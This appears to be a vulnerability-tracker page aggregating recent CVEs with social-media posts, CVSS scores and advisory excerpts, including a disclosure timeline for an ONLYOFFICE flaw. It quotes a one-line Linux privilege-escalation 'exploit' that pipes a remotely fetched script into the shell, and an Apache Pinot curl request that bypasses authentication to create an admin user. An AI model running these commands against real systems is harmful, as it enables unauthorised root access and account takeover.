Overview
- 1902756969
- reggie
Description
Statistics
- 1 Post
- 61 Interactions
Fediverse

💥CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):
“. <(curl -SsfL https://thc.org/7350pipe)”
Overview
Description
Statistics
- 3 Posts
- 3 Interactions
Fediverse

https://seclists.org/oss-sec/2025/q2/0
"The analyze(sic!) of the patch (https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=cbb26f7d8451fe56ccac802c6db48d16240feebd) reveals that the root cause of the bug has been partially fixed."

https://seclists.org/oss-sec/2025/q2/3
"A reason CVE-2024-57882 may have stayed unpatched in a distro is it could have been wrongly believed to be a NULL pointer dereference only due to a specific crash reported by Syzbot."
"net.mptcp.enabled can be set from inside an unprivileged net namespace"
Overview
Description
Statistics
- 1 Post
- 14 Interactions
Fediverse

this 11yo CVE aged well
Overview
Description
Statistics
- 1 Post
- 13 Interactions
Fediverse

Researchers, you don't need to be this patient. Just publish that shit.
https://medium.com/@mihat2/onlyoffice-document-server-path-traversal-fdd573fec291
Directory Traversal vulnerability in ONLYOFFICE Document Server v.7.5.0 and before allows a remote attacker to obtain sensitive information via a crafted file upload.
- October 10, 2023 – The moment I realized the flaw was real, I immediately reached out to ONLYOFFICE’s security team. To my surprise, they responded the same day! To ensure they had all the details, I sent them a thorough PDF report outlining the vulnerability, complete with technical analysis, proof-of-concept, and potential impact. I thought this was going to be a smooth disclosure process — how wrong I was.
- October 11 — November 19, 2023 — I followed up. Again. And again. Silence. Maybe my emails were lost? Maybe they were ignoring me? Either way, weeks passed, and still — no response.
- November 20, 2023 – We submitted the vulnerability to HackerOne, hoping to reach the ONLYOFFICE through another channel.
- December 4, 2023 – With no response from HackerOne, we escalated the report to HackerOne Disclosure Assistance, but STILL received no response.
- February 19, 2024 – ONLYOFFICE finally responded, stating that they were working on a fix.
- February 26, 2024 – ONLYOFFICE released a fix for the vulnerability.
- April 1, 2024 – ONLYOFFICE informed us that while the fix was available, some products would not receive the security patch until Summer 2024. They requested that we delay public disclosure until July 2024.
- February 21, 2025 – HackerOne Disclosure Assistance responded, stating that they were reviewing the backlog and asked for an update on the current situation.
Overview
- remix-run
- react-router
Description
Statistics
- 1 Post
- 7 Interactions
Fediverse

Simple and practical vulns like this are always nice to read about and learn from and replicate.
https://github.com/remix-run/react-router/security/advisories/GHSA-4q56-crqp-v477
sev:HIGH 7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
React Router is a multi-strategy router for React bridging the gap from React 18 to React 19. There is a vulnerability in Remix/React Router that affects all Remix 2 and React Router 7 consumers using the Express adapter. Basically, this vulnerability allows anyone to spoof the URL used in an incoming Request by putting a URL pathname in the port section of a URL that is part of a Host or X-Forwarded-Host header sent to a Remix/React Router request handler. This issue has been patched and released in Remix 2.16.3 and React Router 7.4.1.
Overview
- Apache Software Foundation
- Apache Parquet Java
- org.apache.parquet:parquet-avro
Description
Statistics
- 1 Post
- 5 Interactions
Fediverse

And we have a perfect 10 in Apache Parquet, whatever that is. 🥳
sev:CRIT 10.0 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
Schema parsing in the parquet-avro module of Apache Parquet 1.15.0 and previous versions allows bad actors to execute arbitrary code
Users are recommended to upgrade to version 1.15.1, which fixes the issue.
Overview
Description
Statistics
- 1 Post
- 3 Interactions
Overview
- Microsoft
- Azure Health Bot
Description
Statistics
- 1 Post
- 4 Interactions
Fediverse

Another Microsoft cloud service vuln got patched. They claim no exploitation and it wasn't publicly known so you should be okay but that trust thing is hard.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21384
sev:HIGH 8.3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
An authenticated attacker can exploit an Server-Side Request Forgery (SSRF) vulnerability in Microsoft Azure Health Bot to elevate privileges over a network.
Overview
- Kentico
- Xperience
Description
Statistics
- 1 Post
- 2 Interactions
Overview
- Apache Software Foundation
- Apache Pinot
- org.apache.pinot.controller.api
Description
Statistics
- 1 Post
- 2 Interactions
Fediverse

I don't know Apache Pinot but this seems like a good one to keep in your back pocket.
https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v
Authentication Bypass Issue
If the path does not contain / and contain., authentication is not required.
Expected Normal Request and Response Example
curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users
Return: {"code":401,"error":"HTTP 401 Unauthorized"}
Malicious Request and Response Example
curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .
Return: {"users":{}}